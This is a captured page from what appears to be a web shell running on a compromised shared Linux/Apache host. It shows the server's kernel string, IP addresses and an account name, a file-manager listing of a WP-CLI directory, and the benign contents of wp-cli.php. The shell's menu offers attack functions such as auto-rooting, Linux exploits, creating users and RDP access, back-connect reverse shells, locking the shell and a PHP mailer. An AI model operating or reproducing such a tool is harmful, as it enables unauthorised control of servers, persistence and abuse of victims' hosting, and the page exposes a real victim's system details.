Linux iad1-shared-b7-18 6.6.49-grsec-jammy+ #10 SMP Thu Sep 12 23:23:08 UTC 2024 x86_64
Apache
: 67.205.6.31 | : 216.73.216.47
Cant Read [ /etc/named.conf ]
8.2.29
fernandoquevedo
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
README
+ Create Folder
+ Create File
/
usr /
local /
wp /
php /
[ HOME SHELL ]
Name
Size
Permission
Action
WP_CLI
[ DIR ]
drwxr-xr-x
commands
[ DIR ]
drwxr-xr-x
boot-fs.php
401
B
-rw-r--r--
bootstrap.php
2.31
KB
-rw-r--r--
class-wp-cli-command.php
140
B
-rw-r--r--
class-wp-cli.php
43.75
KB
-rw-r--r--
compat.php
6
B
-rw-r--r--
config-spec.php
3.52
KB
-rw-r--r--
dispatcher.php
344
B
-rw-r--r--
fallback-functions.php
348
B
-rw-r--r--
utils-wp.php
16.39
KB
-rw-r--r--
utils.php
56.56
KB
-rw-r--r--
wp-cli.php
1.34
KB
-rw-r--r--
wp-settings-cli.php
16.84
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : wp-cli.php
<?php // Can be used by plugins/themes to check if WP-CLI is running or not. define( 'WP_CLI', true ); define( 'WP_CLI_VERSION', trim( file_get_contents( WP_CLI_ROOT . '/VERSION' ) ) ); define( 'WP_CLI_START_MICROTIME', microtime( true ) ); if ( file_exists( WP_CLI_ROOT . '/vendor/autoload.php' ) ) { define( 'WP_CLI_VENDOR_DIR', WP_CLI_ROOT . '/vendor' ); } elseif ( file_exists( dirname( dirname( WP_CLI_ROOT ) ) . '/autoload.php' ) ) { define( 'WP_CLI_VENDOR_DIR', dirname( dirname( WP_CLI_ROOT ) ) ); } elseif ( file_exists( dirname( WP_CLI_ROOT ) . '/vendor/autoload.php' ) ) { define( 'WP_CLI_VENDOR_DIR', dirname( WP_CLI_ROOT ) . '/vendor' ); } else { define( 'WP_CLI_VENDOR_DIR', WP_CLI_ROOT . '/vendor' ); } require_once WP_CLI_ROOT . '/php/compat.php'; // Set common headers, to prevent warnings from plugins. $_SERVER['SERVER_PROTOCOL'] = 'HTTP/1.0'; $_SERVER['HTTP_USER_AGENT'] = ( ! empty( getenv( 'WP_CLI_USER_AGENT' ) ) ? getenv( 'WP_CLI_USER_AGENT' ) : 'WP CLI ' . WP_CLI_VERSION ); $_SERVER['REQUEST_METHOD'] = 'GET'; $_SERVER['REMOTE_ADDR'] = '127.0.0.1'; require_once WP_CLI_ROOT . '/php/bootstrap.php'; if ( getenv( 'WP_CLI_EARLY_REQUIRE' ) ) { foreach ( explode( ',', getenv( 'WP_CLI_EARLY_REQUIRE' ) ) as $wp_cli_early_require ) { require_once trim( $wp_cli_early_require ); } unset( $wp_cli_early_require ); } WP_CLI\bootstrap();
Close